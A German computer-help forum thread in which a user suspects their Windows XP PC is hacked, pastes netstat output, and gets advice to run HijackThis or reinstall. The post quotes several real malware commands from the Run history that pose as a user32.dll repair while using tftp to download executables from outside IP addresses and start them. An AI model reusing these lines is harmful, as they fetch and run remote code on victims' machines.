hallo, ich glaube ich wurde und werde täglich gehackt

wie ich darauf komme:
es öffnet sich manchmal einfach so ein cmd fenster wo paar befehle eingegeben werden (nicht von mir).

wenn ich auf start, ausführen drücke kann ich mir dann paar von diesen eingegebenenen befehlen sehn:
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 66.130.140.108 GET cqoobgsq.exe & start cqoobgsq&

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 71.195.9.52 GET mjjnhv.exe & start mjjnhv&

services.msc

%systemroot%\system32\cmd.exe

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 63.252.66.11 GET diemtvm.exe & start diemtvm&

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 63.252.66.11 GET xkjtgnz.exe & start xkjtgnz&

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 66.130.140.108 GET kuvpc.exe & start kuvpc&

dxdiag

cmd

und noch paar netstat befehle die ich eingegeben habe:
netstat
netstat -a
netstat -n
mein netstat fenster wurde sofort wieder geschlossen nachdem ich es aufgerufen habe
aber ich hab es immer wieder gemacht und weil ich es nicht schnell genug lesen konnte, einfach mal ein screenshot gemacht
und dann bei Paint in ruhe angeschaut

Hab mal das Paintbild für euch abgetippt

Befehl: Netstat

Aktive Verbingen
Proto Lokale Adresse Remoteadresse Status
TCP Computername:1263 nf-in-f104.google.com:http HERGESTELLT
TCP Computername:1264 static-fxfeeds.nllb.nl.mozilla.com:http WARTEND
TCP Computername:1265 nf-in-f147.google.com:http HERGESSTELLT
TCP Computername:1266 195.50.169.74:http HERGESTELLT
TCP Computername:1267 nf-in-f103.google.com:http HERGESTELLT
TCP Computername:1268 nf-in-f103.google.com:http HERGESTELLT
TCP Computername:1295 kr-in-f164.google.com:http HERGESTELLT
TCP Computername:1296 m04s26da.ispgateway.de:http WARTEND
TCP Computername:1306 m04s26da.ispgateway.de:http WARTEND
TCP Computername:1313 cg-in-f99.goog.e.com:http HERGESTELLT
TCP Computername:1259 localhost:1260 HERGESTELLT
TCP Computername:1260 localhost:1259 HERGESTELLT
TCP Computername:1261 localhost:1262 HERGESTELLT
TCP Computername:1262 localhost:1261 HERGESTELLT


Befehl: Netstat -n
Aktive Verbingen
Proto Lokale Adresse Remoteadresse Status
TCP 88.64.23.191:1265 64.233.183.147:80 HERGESTELLT
TCP 88.64.23.191:1266 195.50.169.74:80 HERGESTELLT
TCP 88.64.23.191:1267 64.233.183.103:80 HERGESTELLT
TCP 88.64.23.191:1268 64.233.183.103:80 HERGESTELLT
TCP 88.64.23.191:1287 66.102.11.164:80 HERGESTELLT
TCP 88.64.23.191:1295 66.102.11.164:80 HERGESTELLT
TCP 88.64.23.191:1313 209.85.171.99:80 HERGESTELLT
TCP 88.64.23.191:1317 66.249.93.91:80 HERGESTELLT
TCP 127.0.0.1:1259 127.0.0.1:1260 HERGESTELLT
TCP 127.0.0.1:1260 127.0.0.1:1259 HERGESTELLT
TCP 127.0.0.1:1261 127.0.0.1:1262 HERGESTELLT
TCP 127.0.0.1:1262 127.0.0.1:1261 HERGESTELLT



dann besitz ich noch eine Datei die als Virus erkannt wird:
Name: tftp (.exe)
Details: Beschreibung: Trivial File Transfer Protocol App
Dateiversion: 5.1.2600.0
Copyright: © Microsoft Corporation. Alle Rechte vorbehalten.
Pfad: C:\WINXP\system32
Größe: 17 KB
Name: TFTP.EXE-021943F7.pf
Details: Beschreibung: PF-Datei
Öffnen mit: Unbekannte Anwendung
Größe: 14,8 KB
Pfad:C:\WINXP\Prefetch

Name: TFTP3008
Details: Dateityp: Datei
Größe: 0 Byte
C:\WINXP\system32

Wenn ich die Datei tftp.exe lösche kommt sie immer wieder!

dann habe ich einmal gesehn wie ein cmd fenster auf ging und dann die skypetalk.exe aufgerufen wurde, obwohl ich nicht mal skype hab.
Name: Skypetalk.exe
Pfad: C:\WINXP\Programme\Gemeinsame Dateien\System\Skypetalk.exe
dann wurden paar befehle eingegeben und dann am ende hat er ''bye'' geschrieben und dann war das cmd fenster auch schon wieder weg.

Für mich ist der Fall ganz klar, das einer meiner PC's geownded ist von einem Hacker
Er hat (glaub ich) keine Dateien gelöscht (Deswegen geht noch Netstat, auch wenn es sich wieder schließt).
Der Hacker benutzt ein Gateway das konnte ich sehen als ich den Netstatbefehl bei Paint betrachtete.Aber das könnt ihr ja auch selber sehn

TCP Computername:1296 m04s26da.ispgateway.de:http WARTEND
TCP Computername:1306 m04s26da.ispgateway.de:http WARTEND


Was ratet ihr mir jetzt? Soll ich am besten Windows komplett wieder neu installieren?

Hallo,

am sichersten ist es natürlich immer, Windows neu zu installieren. Vielleicht können wir dir aber auch helfen, das Problem anders zu lösen.

Erstelle ein Logfile mit HijackThis gemäß Anleitung und poste es in diesem Thread, damit wir sehen können, welche Programme auf deinem Computer laufen und welche Probleme dadurch verursacht werden können.

Also ich würde dir raten deine Windows CD zu nehmen und gleich neuinstallieren ich denke mal du hast xp gleich alle updates drauf sp2 usw..

Danke für eure Hilfe. Ich installier am besten Windows komplett neu, da mein PC sowieso ziemlich vieles Zeug drauf hat was ich nicht brauche!